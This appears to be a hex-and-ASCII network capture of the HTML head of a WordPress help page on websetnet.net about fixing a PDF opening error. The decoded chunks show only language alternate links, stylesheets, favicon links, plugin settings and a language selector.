                                                                                              2021-12-13 23:57:31 UTC8104INData Raw: 65 36 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 73 75 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 2f 73 75 2f 66 69 78 2d 74 68 65 72 65 2d 77 61 73 2d 61 6e 2d 65 72 72 6f 72 2d 6f 70 65 6e 69 6e 67 2d 74 68 69 73 2d 64 6f 63 75 6d 65 6e 74 2f 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 73 77 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 2f 73 77 2f 66 69 78 2d 74 68 65 72 65 2d 77 61 73 2d 61 6e 2d 65 72 72 6f 72 2d 6f 70 65 6e 69 6e 67 2d 74 68 69 73 2d 64 6f 63 75 6d 65 6e 74 2f 22 3e 0a 0d 0a
                                                                                              Data Ascii: e6<link rel="alternate" hreflang="su" href="https://websetnet.net/su/fix-there-was-an-error-opening-this-document/"><link rel="alternate" hreflang="sw" href="https://websetnet.net/sw/fix-there-was-an-error-opening-this-document/">
                                                                                              2021-12-13 23:57:31 UTC8105INData Raw: 65 35 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 73 76 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 2f 73 76 2f 66 69 78 2d 74 68 65 72 65 2d 77 61 73 2d 61 6e 2d 65 72 72 6f 72 2d 6f 70 65 6e 69 6e 67 2d 74 68 69 73 2d 64 6f 63 75 6d 65 6e 74 2f 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 74 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 2f 74 67 2f 66 69 78 2d 74 68 65 72 65 2d 77 61 73 2d 61 6e 2d 65 72 72 6f 72 2d 6f 70 65 6e 69 6e 67 2d 74 68 69 73 2d 64 6f 63 75 6d 65 6e 74 2f 22 3e 0d 0a
                                                                                              Data Ascii: e5<link rel="alternate" hreflang="sv" href="https://websetnet.net/sv/fix-there-was-an-error-opening-this-document/"><link rel="alternate" hreflang="tg" href="https://websetnet.net/tg/fix-there-was-an-error-opening-this-document/">
                                                                                              2021-12-13 23:57:31 UTC8105INData Raw: 65 37 0d 0a 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 74 61 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 2f 74 61 2f 66 69 78 2d 74 68 65 72 65 2d 77 61 73 2d 61 6e 2d 65 72 72 6f 72 2d 6f 70 65 6e 69 6e 67 2d 74 68 69 73 2d 64 6f 63 75 6d 65 6e 74 2f 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 74 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 2f 74 65 2f 66 69 78 2d 74 68 65 72 65 2d 77 61 73 2d 61 6e 2d 65 72 72 6f 72 2d 6f 70 65 6e 69 6e 67 2d 74 68 69 73 2d 64 6f 63 75 6d 65 6e 74 2f 22 3e 0a 0d 0a
                                                                                              Data Ascii: e7<link rel="alternate" hreflang="ta" href="https://websetnet.net/ta/fix-there-was-an-error-opening-this-document/"><link rel="alternate" hreflang="te" href="https://websetnet.net/te/fix-there-was-an-error-opening-this-document/">
                                                                                              2021-12-13 23:57:31 UTC8105INData Raw: 37 32 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 74 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 2f 74 68 2f 66 69 78 2d 74 68 65 72 65 2d 77 61 73 2d 61 6e 2d 65 72 72 6f 72 2d 6f 70 65 6e 69 6e 67 2d 74 68 69 73 2d 64 6f 63 75 6d 65 6e 74 2f 22 3e 0d 0a
                                                                                              Data Ascii: 72<link rel="alternate" hreflang="th" href="https://websetnet.net/th/fix-there-was-an-error-opening-this-document/">
                                                                                              2021-12-13 23:57:31 UTC8105INData Raw: 31 35 39 0d 0a 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 74 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 2f 74 72 2f 66 69 78 2d 74 68 65 72 65 2d 77 61 73 2d 61 6e 2d 65 72 72 6f 72 2d 6f 70 65 6e 69 6e 67 2d 74 68 69 73 2d 64 6f 63 75 6d 65 6e 74 2f 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 75 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 2f 75 6b 2f 66 69 78 2d 74 68 65 72 65 2d 77 61 73 2d 61 6e 2d 65 72 72 6f 72 2d 6f 70 65 6e 69 6e 67 2d 74 68 69 73 2d 64 6f 63 75 6d 65 6e 74 2f 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74
                                                                                              Data Ascii: 159<link rel="alternate" hreflang="tr" href="https://websetnet.net/tr/fix-there-was-an-error-opening-this-document/"><link rel="alternate" hreflang="uk" href="https://websetnet.net/uk/fix-there-was-an-error-opening-this-document/"><link rel="alternat
                                                                                              2021-12-13 23:57:31 UTC8106INData Raw: 32 33 66 0d 0a 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 75 7a 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 2f 75 7a 2f 66 69 78 2d 74 68 65 72 65 2d 77 61 73 2d 61 6e 2d 65 72 72 6f 72 2d 6f 70 65 6e 69 6e 67 2d 74 68 69 73 2d 64 6f 63 75 6d 65 6e 74 2f 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 76 69 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 2f 76 69 2f 66 69 78 2d 74 68 65 72 65 2d 77 61 73 2d 61 6e 2d 65 72 72 6f 72 2d 6f 70 65 6e 69 6e 67 2d 74 68 69 73 2d 64 6f 63 75 6d 65 6e 74 2f 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74
                                                                                              Data Ascii: 23f<link rel="alternate" hreflang="uz" href="https://websetnet.net/uz/fix-there-was-an-error-opening-this-document/"><link rel="alternate" hreflang="vi" href="https://websetnet.net/vi/fix-there-was-an-error-opening-this-document/"><link rel="alternat
                                                                                              2021-12-13 23:57:31 UTC8106INData Raw: 65 37 0d 0a 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 79 6f 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 2f 79 6f 2f 66 69 78 2d 74 68 65 72 65 2d 77 61 73 2d 61 6e 2d 65 72 72 6f 72 2d 6f 70 65 6e 69 6e 67 2d 74 68 69 73 2d 64 6f 63 75 6d 65 6e 74 2f 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 7a 75 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 2f 7a 75 2f 66 69 78 2d 74 68 65 72 65 2d 77 61 73 2d 61 6e 2d 65 72 72 6f 72 2d 6f 70 65 6e 69 6e 67 2d 74 68 69 73 2d 64 6f 63 75 6d 65 6e 74 2f 22 3e 0a 0d 0a
                                                                                              Data Ascii: e7<link rel="alternate" hreflang="yo" href="https://websetnet.net/yo/fix-there-was-an-error-opening-this-document/"><link rel="alternate" hreflang="zu" href="https://websetnet.net/zu/fix-there-was-an-error-opening-this-document/">
                                                                                              2021-12-13 23:57:31 UTC8106INData Raw: 37 37 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6d 70 68 74 6d 6c 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 2f 70 74 2f 63 6f 72 72 65 25 43 33 25 41 37 25 43 33 25 41 33 6f 25 32 43 2d 6f 63 6f 72 72 65 75 2d 75 6d 2d 65 72 72 6f 2d 61 6f 2d 61 62 72 69 72 2d 65 73 74 65 2d 64 6f 63 75 6d 65 6e 74 6f 2f 61 6d 70 2f 22 3e 0d 0a
                                                                                              Data Ascii: 77<link rel="amphtml" href="https://websetnet.net/pt/corre%C3%A7%C3%A3o%2C-ocorreu-um-erro-ao-abrir-este-documento/amp/">
                                                                                              2021-12-13 23:57:31 UTC8106INData Raw: 31 0d 0a 0a 0d 0a
                                                                                              Data Ascii: 1
                                                                                              2021-12-13 23:57:31 UTC8106INData Raw: 36 66 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 65 62 53 65 74 4e 65 74 20 c2 bb 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 2f 66 65 65 64 2f 22 3e 0a 0d 0a
                                                                                              Data Ascii: 6f<link rel="alternate" type="application/rss+xml" title="WebSetNet Feed" href="https://websetnet.net/feed/">
                                                                                              2021-12-13 23:57:31 UTC8107INData Raw: 37 35 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 63 61 6e 6f 6e 69 63 61 6c 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 2f 70 74 2f 63 6f 72 72 65 25 43 33 25 41 37 25 43 33 25 41 33 6f 25 32 43 2d 6f 63 6f 72 72 65 75 2d 75 6d 2d 65 72 72 6f 2d 61 6f 2d 61 62 72 69 72 2d 65 73 74 65 2d 64 6f 63 75 6d 65 6e 74 6f 2f 22 3e 0d 0a
                                                                                              Data Ascii: 75<link rel="canonical" href="https://websetnet.net/pt/corre%C3%A7%C3%A3o%2C-ocorreu-um-erro-ao-abrir-este-documento/">
                                                                                              2021-12-13 23:57:31 UTC8107INData Raw: 31 32 61 0d 0a 0a 3c 73 63 72 69 70 74 20 69 64 3d 22 77 70 70 2d 6a 73 6f 6e 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 3e 7b 22 73 61 6d 70 6c 69 6e 67 5f 61 63 74 69 76 65 22 3a 31 2c 22 73 61 6d 70 6c 69 6e 67 5f 72 61 74 65 22 3a 31 30 30 2c 22 61 6a 61 78 5f 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 2f 77 70 2d 6a 73 6f 6e 2f 77 6f 72 64 70 72 65 73 73 2d 70 6f 70 75 6c 61 72 2d 70 6f 73 74 73 2f 76 31 2f 70 6f 70 75 6c 61 72 2d 70 6f 73 74 73 22 2c 22 61 70 69 5f 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 2f 77 70 2d 6a 73 6f 6e 2f 77 6f 72 64 70 72 65 73 73 2d 70 6f 70 75 6c 61 72 2d 70 6f 73 74 73 22 2c 22 49 44 22 3a 32 30 32 37 36 2c 22
                                                                                              Data Ascii: 12a<script id="wpp-json" type="application/json">{"sampling_active":1,"sampling_rate":100,"ajax_url":"https://websetnet.net/wp-json/wordpress-popular-posts/v1/popular-posts","api_url":"https://websetnet.net/wp-json/wordpress-popular-posts","ID":20276,"
                                                                                              2021-12-13 23:57:31 UTC8107INData Raw: 33 64 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0d 0a
                                                                                              Data Ascii: 3d<link rel="pingback" href="https://websetnet.net/xmlrpc.php">
                                                                                              2021-12-13 23:57:31 UTC8107INData Raw: 39 62 0d 0a 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 74 61 74 69 63 61 6c 6c 79 2e 69 6f 2f 69 6d 67 2f 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 2f 66 3d 61 75 74 6f 25 32 43 71 3d 36 30 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 30 2f 30 37 2f 66 61 76 69 63 6f 6e 2d 31 36 78 31 36 2d 70 6e 67 2d 37 2d 36 35 78 36 35 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 3e 0a 0d 0a
                                                                                              Data Ascii: 9b<link rel="icon" href="https://cdn.statically.io/img/websetnet.net/f=auto%2Cq=60/wp-content/uploads/2020/07/favicon-16x16-png-7-65x65.png" sizes="32x32">
                                                                                              2021-12-13 23:57:31 UTC8107INData Raw: 31 33 37 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 74 61 74 69 63 61 6c 6c 79 2e 69 6f 2f 69 6d 67 2f 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 2f 66 3d 61 75 74 6f 25 32 43 71 3d 36 30 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 30 2f 30 37 2f 66 61 76 69 63 6f 6e 2d 31 36 78 31 36 2d 70 6e 67 2d 37 2d 32 34 34 78 32 34 34 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 39 32 78 31 39 32 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 74 61 74 69 63 61 6c 6c 79 2e 69 6f 2f 69 6d 67 2f 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 2f 66 3d 61 75 74 6f 25 32 43 71 3d 36 30
                                                                                              Data Ascii: 137<link rel="icon" href="https://cdn.statically.io/img/websetnet.net/f=auto%2Cq=60/wp-content/uploads/2020/07/favicon-16x16-png-7-244x244.png" sizes="192x192"><link rel="apple-touch-icon" href="https://cdn.statically.io/img/websetnet.net/f=auto%2Cq=60
                                                                                              2021-12-13 23:57:31 UTC8108INData Raw: 35 63 63 0d 0a 0a 3c 73 74 79 6c 65 3e 2e 68 65 61 74 65 6f 72 5f 73 73 73 5f 62 75 74 74 6f 6e 5f 69 6e 73 74 61 67 72 61 6d 20 73 70 61 6e 2e 68 65 61 74 65 6f 72 5f 73 73 73 5f 73 76 67 2c 61 2e 68 65 61 74 65 6f 72 5f 73 73 73 5f 69 6e 73 74 61 67 72 61 6d 20 73 70 61 6e 2e 68 65 61 74 65 6f 72 5f 73 73 73 5f 73 76 67 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 72 61 64 69 61 6c 2d 67 72 61 64 69 65 6e 74 28 63 69 72 63 6c 65 20 61 74 20 33 30 25 20 31 30 37 25 2c 23 66 64 66 34 39 37 20 30 2c 23 66 64 66 34 39 37 20 35 25 2c 23 66 64 35 39 34 39 20 34 35 25 2c 23 64 36 32 34 39 66 20 36 30 25 2c 23 32 38 35 61 65 62 20 39 30 25 29 7d 2e 68 65 61 74 65 6f 72 5f 73 73 73 5f 68 6f 72 69 7a 6f 6e 74 61 6c 5f 73 68 61 72 69 6e 67 20 2e 68 65 61 74 65 6f 72 5f 73
                                                                                              Data Ascii: 5cc<style>.heateor_sss_button_instagram span.heateor_sss_svg,a.heateor_sss_instagram span.heateor_sss_svg{background:radial-gradient(circle at 30% 107%,#fdf497 0,#fdf497 5%,#fd5949 45%,#d6249f 60%,#285aeb 90%)}.heateor_sss_horizontal_sharing .heateor_s
                                                                                              2021-12-13 23:57:31 UTC8109INData Raw: 35 62 61 0d 0a 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 6d 61 67 61 7a 69 6e 65 2d 70 72 6f 2d 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 74 61 74 69 63 61 6c 6c 79 2e 69 6f 2f 63 73 73 2f 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 6d 61 67 61 7a 69 6e 65 2d 70 72 6f 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 22 6d 61 67 61 7a 69 6e 65 2d 70 72 6f 2d 69 6e 6c 69 6e 65 2d 63 73 73 22 3e 62 75 74 74 6f 6e 3a 66 6f 63 75 73 2c 62 75 74 74 6f 6e 3a 68 6f 76 65 72 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 5d 3a 68
                                                                                              Data Ascii: 5ba<link rel="stylesheet" id="magazine-pro-css" href="https://cdn.statically.io/css/websetnet.net/wp-content/themes/magazine-pro/style.css"><style id="magazine-pro-inline-css">button:focus,button:hover,input[type="button"]:focus,input[type="button"]:h
                                                                                              2021-12-13 23:57:31 UTC8110INData Raw: 35 37 0d 0a 78 2d 77 69 64 74 68 3a 32 32 30 70 78 7d 2e 77 70 2d 63 75 73 74 6f 6d 2d 6c 6f 67 6f 20 2e 68 65 61 64 65 72 2d 77 69 64 67 65 74 2d 61 72 65 61 7b 6d 61 78 2d 77 69 64 74 68 3a 63 61 6c 63 28 39 39 25 20 2d 20 32 32 30 70 78 29 7d 3c 2f 73 74 79 6c 65 3e 0a 0d 0a
                                                                                              Data Ascii: 57x-width:220px}.wp-custom-logo .header-widget-area{max-width:calc(99% - 220px)}</style>
                                                                                              2021-12-13 23:57:31 UTC8111INData Raw: 38 65 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 77 70 2d 62 6c 6f 63 6b 2d 6c 69 62 72 61 72 79 2d 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 74 61 74 69 63 61 6c 6c 79 2e 69 6f 2f 77 70 2f 63 2f 35 2e 38 2e 32 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 63 73 73 2f 64 69 73 74 2f 62 6c 6f 63 6b 2d 6c 69 62 72 61 72 79 2f 73 74 79 6c 65 2e 6d 69 6e 2e 63 73 73 22 3e 0d 0a
                                                                                              Data Ascii: 8e<link rel="stylesheet" id="wp-block-library-css" href="https://cdn.statically.io/wp/c/5.8.2/wp-includes/css/dist/block-library/style.min.css">
                                                                                              2021-12-13 23:57:31 UTC8111INData Raw: 31 0d 0a 0a 0d 0a
                                                                                              Data Ascii: 1
                                                                                              2021-12-13 23:57:31 UTC8111INData Raw: 61 64 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 77 6f 72 64 70 72 65 73 73 2d 70 6f 70 75 6c 61 72 2d 70 6f 73 74 73 2d 63 73 73 2d 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 74 61 74 69 63 61 6c 6c 79 2e 69 6f 2f 63 73 73 2f 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 77 6f 72 64 70 72 65 73 73 2d 70 6f 70 75 6c 61 72 2d 70 6f 73 74 73 2f 61 73 73 65 74 73 2f 63 73 73 2f 77 70 70 2e 63 73 73 22 3e 0d 0a
                                                                                              Data Ascii: ad<link rel="stylesheet" id="wordpress-popular-posts-css-css" href="https://cdn.statically.io/css/websetnet.net/wp-content/plugins/wordpress-popular-posts/assets/css/wpp.css">
                                                                                              2021-12-13 23:57:31 UTC8111INData Raw: 66 62 65 0d 0a 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 2f 63 64 6e 2d 63 67 69 2f 73 63 72 69 70 74 73 2f 37 64 30 66 61 31 30 61 2f 63 6c 6f 75 64 66 6c 61 72 65 2d 73 74 61 74 69 63 2f 72 6f 63 6b 65 74 2d 6c 6f 61 64 65 72 2e 6d 69 6e 2e 6a 73 22 20 64 61 74 61 2d 63 66 2d 73 65 74 74 69 6e 67 73 3d 22 39 61 30 30 31 36 37 62 33 38 39 30 32 32 66 36 64 64 66 62 64 38 65 62 2d 7c 34 39 22 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 69 64 3d 22 6d 61 67 61 7a 69 6e 65 2d 70 72 6f 2d 66 6f 6e 74 73 2d 63 73 73 22 20
                                                                                              Data Ascii: fbe<script src="https://websetnet.net/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="9a00167b389022f6ddfbd8eb-|49" data-cfasync="false" type="text/javascript"></script><link rel="preload" id="magazine-pro-fonts-css"
                                                                                              2021-12-13 23:57:31 UTC8115INData Raw: 61 39 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 79 61 72 70 70 52 65 6c 61 74 65 64 43 73 73 2d 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 74 61 74 69 63 61 6c 6c 79 2e 69 6f 2f 63 73 73 2f 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 79 65 74 2d 61 6e 6f 74 68 65 72 2d 72 65 6c 61 74 65 64 2d 70 6f 73 74 73 2d 70 6c 75 67 69 6e 2f 73 74 79 6c 65 2f 72 65 6c 61 74 65 64 2e 63 73 73 22 3e 0d 0a
                                                                                              Data Ascii: a9<link rel="stylesheet" id="yarppRelatedCss-css" href="https://cdn.statically.io/css/websetnet.net/wp-content/plugins/yet-another-related-posts-plugin/style/related.css">
                                                                                              2021-12-13 23:57:31 UTC8115INData Raw: 65 33 33 0d 0a 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 2c 20 6d 61 78 2d 73 6e 69 70 70 65 74 3a 2d 31 2c 20 6d 61 78 2d 76 69 64 65 6f 2d 70 72 65 76 69 65 77 3a 2d 31 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 75 72 69 2d 74 72 61 6e 73 6c 61 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 6e 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4f 73 20 61 72 71 75 69 76 6f 73 20 50 44 46 20 73 c3 a3 6f 20 6d 75 69 74 6f 20 70 6f 70 75 6c 61 72 65 73 20 65 6d 20 74 6f 64 6f 20 6f 20 6d 75 6e 64 6f 2c 20 70 6f 69 73 20 73 c3 a3 6f 20 6d 75 69 74 6f 20 76 65 72 73 c3 a1 74 65 69
                                                                                              Data Ascii: e33<meta name="robots" content="max-image-preview:large, max-snippet:-1, max-video-preview:-1"><meta name="uri-translation" content="on"><meta name="description" content="Os arquivos PDF so muito populares em todo o mundo, pois so muito verstei
                                                                                              2021-12-13 23:57:31 UTC8119INData Raw: 31 30 30 64 0d 0a 3c 73 65 6c 65 63 74 20 6f 6e 63 68 61 6e 67 65 3d 22 69 66 20 28 21 77 69 6e 64 6f 77 2e 5f 5f 63 66 52 4c 55 6e 62 6c 6f 63 6b 48 61 6e 64 6c 65 72 73 29 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 20 64 6f 47 54 72 61 6e 73 6c 61 74 65 28 74 68 69 73 29 3b 22 20 63 6c 61 73 73 3d 22 6e 6f 74 72 61 6e 73 6c 61 74 65 22 20 69 64 3d 22 67 74 72 61 6e 73 6c 61 74 65 5f 73 65 6c 65 63 74 6f 72 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 57 65 62 73 69 74 65 20 4c 61 6e 67 75 61 67 65 20 53 65 6c 65 63 74 6f 72 22 20 64 61 74 61 2d 63 66 2d 6d 6f 64 69 66 69 65 64 2d 39 61 30 30 31 36 37 62 33 38 39 30 32 32 66 36 64 64 66 62 64 38 65 62 2d 3d 22 22 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 22 3e 53 65 6c 65 63 74 20 4c 61 6e 67 75 61 67
                                                                                              Data Ascii: 100d<select onchange="if (!window.__cfRLUnblockHandlers) return false; doGTranslate(this);" class="notranslate" id="gtranslate_selector" aria-label="Website Language Selector" data-cf-modified-9a00167b389022f6ddfbd8eb-=""><option value="">Select Languag
                                                                                              2021-12-13 23:57:31 UTC8123INData Raw: 66 65 39 0d 0a 3c 2f 6f 70 74 69 6f 6e 3e 0a 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 65 6e 7c 73 77 22 3e 4b 69 73 77 61 68 69 6c 69 3c 2f 6f 70 74 69 6f 6e 3e 0a 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 65 6e 7c 73 76 22 3e 53 76 65 6e 73 6b 61 3c 2f 6f 70 74 69 6f 6e 3e 0a 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 65 6e 7c 74 67 22 3e d0 a2 d0 be d2 b7 d0 b8 d0 ba d3 a3 3c 2f 6f 70 74 69 6f 6e 3e 0a 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 65 6e 7c 74 61 22 3e e0 ae a4 e0 ae ae e0 ae bf e0 ae b4 e0 af 8d 3c 2f 6f 70 74 69 6f 6e 3e 0a 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 65 6e 7c 74 65 22 3e e0 b0 a4 e0 b1 86 e0 b0 b2 e0 b1 81 e0 b0 97 e0 b1 81 3c 2f 6f 70 74 69 6f 6e 3e 0a 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 65 6e 7c 74
                                                                                              Data Ascii: fe9</option><option value="en|sw">Kiswahili</option><option value="en|sv">Svenska</option><option value="en|tg"></option><option value="en|ta"></option><option value="en|te"></option><option value="en|t
